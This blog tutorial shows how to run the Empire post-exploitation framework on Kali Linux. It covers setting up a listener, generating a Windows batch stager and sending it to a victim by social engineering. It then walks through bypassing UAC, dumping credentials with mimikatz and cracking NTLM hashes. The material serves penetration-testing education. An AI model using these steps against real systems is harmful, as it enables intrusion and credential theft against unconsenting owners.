Empire -- PowerShell Post-Exploitation Agent

In our today's article we are going to discuss about Empire Framework by BC Security. Now Kali Linux and BC Security made a partnership and Kali users got exclusive early access to “Empire 3” (powershell-empire) & “StarKiller”. That's what exactly Kali developers said:

BC Security is the team who is currently maintaining the most active fork of Empire. In August 2019, the original maintainers archived the project, but with Open-source projects (as long as they don’t break software licenses) other groups can take someone else’s code and improve upon it. This is exactly what BC Security did, forking the project, to keep the flame of PowerShell Empire alive.

On our this detailed tutorial guide we are going to see how we can use Empire 3 on our Kali Linux system and exploit it.

Introduction

Empire is a post-exploitation framework, which its agents supporting various different Operating Systems (OS). Windows is purely implemented in PowerShell (without powershell.exe!), and Linux/macOS is done in Python 3. Feature rich with various options to bypass various protections (and allows for easy modification for custom evasion), Empire is often a favorite for Command and Control (C2) activity.

Empire 3 by bc security on Kali Linux tutorial
Empire focused solely on python with cryptographically-secure communications with the add-on of a flexible architecture. Empire has the means to execute PowerShell agents without the requirement of PowerShell.exe. It can promptly employ post-exploitable modules, which covers a vast range from ranging from keyloggers to mimikatz, etc. Empire framework is a combination of the PowerShell Empire and Python Empire projects BCSecurity also makes awesome up-gradation on it, which makes it user-friendly and convenient. Now we are going to use Empire on our Kali Linux.

PowerShell supplies plentiful offensive benefits which additional consists of the entire entry of .NET, applock whitelisting, and straight entry to Win32. It additionally constructs malicious binaries in reminiscence. It supplies C2 performance and lets you implant the second stage after the primary one. It may also be used for lateral motion. It comes useful because it develops quickly compared to different frameworks. Additionally, because it doesn't requires PowerShell.exe, it permits us to bypass anti-viruses. Therefore, it's best to make use of the Empire.


Install Empire on Kali Linux

Installing Empire on Kali Linux is very easy now. It's comes with Kali official repository. So we just need to type following command on our terminal window:

sudo apt install powershell-empire -y

The above command will prompt for sudo password then start downloading and installing Empire, as we can see in the following screenshot:

installing empire
After the process is complete we can use Empire.

Using Empire on Kali Linux

After installing Empire we need to use following command to start the framework.

sudo powershell-empire

Then the main screen of Empire come in front of us, as the following screenshot:

powershell empire main screen

Here we can see that Empire Framework is running. Here we need to use help command to see all the options of this framework.

help

It will open the help of this framework as we can see in the following screenshot:

powershell empire help menu on Kali Linux
First of all we need to create a listener on our local machine. Type the following command:
listeners

After running the above command, it will say that “[!] No listeners currently active”.

empire listeners

Don't worry, We don't have active listeners now but we are now in the listeners interface. Now in the listeners interface we type following command:

uselistener <TAB> <TAB>

Here in the above command we type uselistener then a space, then press TAB key two times (double TAB) and it will list all the listeners that one can use, such as dbx, http, http_com, redirector, meterpreter, etc.

uselistner list

The most popular and commonly used listener is http and we will use the same in our guide. To use it we need to type following command:

uselistener http

This command will start a listener on port 80. If our port 80 is already busy then we need to stop the services (like Apache). Because this listener is a http listener, it only works on port 80.

starting http listener
Now we use info command, this command shows the information about the particular type of listener we want to start, as seen below.

http listener information

Here we can see the information about our listener. As we can see in the above screenshot that there are a variety of settings we can use to modify or customize our listener. Let’s try changing the name of our listener as it helps to remember all the listeners that are activated, if activated in bulk. So for this, we type following command:

set Name test

This command will change the 'Name' of the listener to test from http.

Listeners automatically fetch 'Host' local IP (values), but in just case we need to change it we can do it by using following command:

set Host 192.168.225.54

If we wish we can check again all the information by using info command again. If everything is alright we can start the listener by using following command:

execute

In the following screenshot we can see that our listener has been started.

emipre listner has been started

Then we go back from the listener interface so that we can execute our modules by using following command:

back
back from the listener

Now we can use stagers on Empire.

Using Stagers on PowerShell Empire

Stagers in Empire are used to set the stage for the post-exploitation activities. They are very similar to payloads, which are used to create a connection back to Empire listener. Stagers can be accessed by using usestager command. We run following command to see all the available stagers.

usestager <tab> <tab>

After using double TAB we can see all the stagers in the following screenshot:

usestager modules

On the above screenshot we can there are lots of modules for Windows and OSX (macOS) also there are some stagers for multi purpose works. Those multi stagers works on any platform.

Here for an example we assume that target is a Windows PC and we use launcher_bat to exploit our target. So we use following command:

usestager windows/launcher_bat

This command will set the launcher_bat stager for our target. We set our listener here by using following command:

set Listener test

Now we just need to execute command to execute.

execute

These above commands will execute our exploit after setting the listener test and creating /tmp/launcher.bat file. Now we need to send this bat file to victim's Windows system anyhow (We can use social engineering tricks). Here we are on our local network and sending this file to our own Windows PC by using simpleHTTP server of Python.

After sending and running the bat file on our target Windows PC we got session on our listener, as we can see in the following screenshot:

emipre listner connected

Agents of Empire

When we send the stager to our target system and the machine executes it, we get a reverse connection back. This is known as an agent.

We can see our agents by simply using agents command:

agents

We can see our active agents in the following screenshot.

active agents on empire

Now we are in agents menu and we can check agents help by using help command.

active agents help options

If the name of the agent not looks easy to remember we can change the name of the agent by simply using following command:

rename AgentName NewName

We have changed our agents name as shown in the following screenshot:

agents name changed

Now we can interact with our agent (we renamed it Agent1 for example) by using following command:

interact Agent1

After applying the command we can interact with our agent as seen in the following screenshot:

intarect with agent

Here also we can press double TAB (TAB TAB) to view all the options in the shell. We got many options which will be very helpful for post exploitation, such as info, job, list and etc as shown in the following screenshot:

agents powerhell empire options

Here for an example we run info command to check the information about our target, as shown in the following screenshot:

information of powershell empire agent on Kali Linux

Now at this point we got session. But to get admin session we need to run bypassuac <listenerName>:

bypassuac test

The above command will add another agent here, as we can see in the following screenshot:

bypassuac test on powershell empire

We can hit enter after sending stage2 agent to get back our console. Now again we can see all our agents list by using agents command, we also renamed our new agent as 'Agent2', as shown in the following screenshot:

powershell empire new agent rename

Our new agent(Agent2) got admin privilege, now we can interact with our new agent by simply using interact <agentname> command:

interact Agent2
interact with new powershell empire agent

For help we also can press <TAB><TAB>(double TAB)here. We can see all options that we can run. We also can run mimikatz here to get the password of our target user on Windows system. We knows that mimikatz will not run in a guest user shell. It requires admin shell, it will be proved here that we got admin access here that's why we can run mimikatz here.

To run mimikatz we just use following command:

mimikatz

Mimikatz will run if our agent have admin privileges, and we can see it on the following screenshot:

powershell empire runs mimikatz

On the above screenshot we can see that our mimikatz is working fine and we got NTLM hash if we were lucky then we also can get plaintext Windows login password here. otherwise we can crack this NTLM hash using RainbowTables or we can use online cracking tools.

cracking NTLM hash online
Cracked the NTLM hash online using CrackStation

Modules on Empire

We also can run various modules using Empire. We can access modules using the usemodule command. We need to type usemodule <Space> <tab> <tab> means, we need to use tab twice after space to see all the modules.

modules list on powershell empire

We can use all these modules to perform activities on target system. We can create persistence backdoor on infected system, keylooggers, even we can prank the system user by showing some text or changing wallpaper.

We will learn more about different modules in a later tutorial. First, let's take a look at how to use modules in Empire. Let's use the "external/generate_agent" as an example. We need to type following command:

usemodule external/generate_agent

The above command will load the module. Once the required module is loaded, type help command to see all the commands we can use with the module.

Then we need to set our Listener by using set Listener <listenerName> command:

set Listener test

Then we need to set the language for the module to run by using following command:

set Language powershell

Then we just need to run execute command to execute it. Simple.

This is how we can use Empire Framework on our Kali Linux system. As we learned on this article Empire can do almost anything on the effected system. The agents and modules opens many more new way for an attacker. Previously this known as PowerShell Empire (archived) now it's under BCSecurity and it is called Empire, So we can tell "Empire Strikes Back". This tool is in development stage so some errors may encounter.

Disclaimer:-  All the information provided on this article are for educational purposes only. The site is no way responsible for any misuse of the information. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done.

Love our articles? Make sure to follow our free email subscription to get all our articles directly on inbox. We are also available on Twitter and GitHub, we post article updates there.

To join our family, join our Telegram Group. We are trying to build a community for Linux and Cybersecurity.

For anything we always happy to help everyone on the comment section. As we know our comment section is always open to everyone. We read each and every comment and we always reply.

author-img
Kali Linux

Comments

No comments
Post a Comment
    google-playkhamsatmostaqltradent